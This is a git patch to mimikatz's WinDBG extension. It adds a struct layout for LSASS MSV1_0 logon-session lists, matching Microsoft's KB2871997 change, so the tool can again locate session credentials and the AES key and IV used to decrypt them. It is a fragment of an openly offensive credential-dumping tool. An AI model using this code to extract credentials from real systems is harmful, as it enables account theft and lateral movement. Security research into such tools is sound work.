From fbebacc9be067efcd13ef67d36f0d2377803eda0 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Sat, 17 May 2014 14:10:59 +0200 Subject: [PATCH] mimilib (WinDBG ext) structures for KB2871997 --- mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h | 37 +++++++++++++++++++++ mimilib/sekurlsadbg/kwindbg.c | 8 +++-- 2 files changed, 43 insertions(+), 2 deletions(-) diff --git a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h index 2d25f89..89cedbd 100644 --- a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h +++ b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h @@ -125,6 +125,43 @@ typedef struct _KIWI_MSV1_0_LIST_61 { PVOID CredentialManager; } KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61; +typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ { + struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Flink; + struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Blink; + PVOID unk0; + ULONG unk1; + PVOID unk2; + ULONG unk3; + ULONG unk4; + ULONG unk5; + HANDLE hSemaphore6; + PVOID unk7; + HANDLE hSemaphore8; + PVOID unk9; + PVOID unk10; + ULONG unk11; + ULONG unk12; + PVOID unk13; + LUID LocallyUniqueIdentifier; + LUID SecondaryLocallyUniqueIdentifier; + BYTE waza[12]; /// to do (maybe align) <=================== + LSA_UNICODE_STRING UserName; + LSA_UNICODE_STRING Domaine; + PVOID unk14; + PVOID unk15; + PSID pSid; + ULONG LogonType; + ULONG Session; + LARGE_INTEGER LogonTime; // autoalign x86 + LSA_UNICODE_STRING LogonServer; + PKIWI_MSV1_0_CREDENTIALS Credentials; + PVOID unk19; + PVOID unk20; + PVOID unk21; + ULONG unk22; + PVOID CredentialManager; +} KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, *PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ; + typedef struct _KIWI_MSV1_0_LIST_62 { struct _KIWI_MSV1_0_LIST_62 *Flink; struct _KIWI_MSV1_0_LIST_62 *Blink; diff --git a/mimilib/sekurlsadbg/kwindbg.c b/mimilib/sekurlsadbg/kwindbg.c index b077884..3444f48 100644 --- a/mimilib/sekurlsadbg/kwindbg.c +++ b/mimilib/sekurlsadbg/kwindbg.c @@ -75,6 +75,7 @@ KUHL_M_SEKURLSA_PACKAGE packages[] = { const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = { {sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)}, {sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)}, + {sizeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, CredentialManager)}, {sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)}, {sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)}, }; @@ -93,9 +94,12 @@ DECLARE_API(mimikatz) else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_8) helper = &lsassEnumHelpers[1]; else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) - helper = &lsassEnumHelpers[2]; - else helper = &lsassEnumHelpers[3]; + else + helper = &lsassEnumHelpers[4]; + + if((NtBuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (NtBuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (GetExpression("lsasrv!LogonSessionLeakList"))) + helper++; // yeah, really, I do that =) pInitializationVector = GetExpression("lsasrv!InitializationVector"); phAesKey = GetExpression("lsasrv!hAesKey");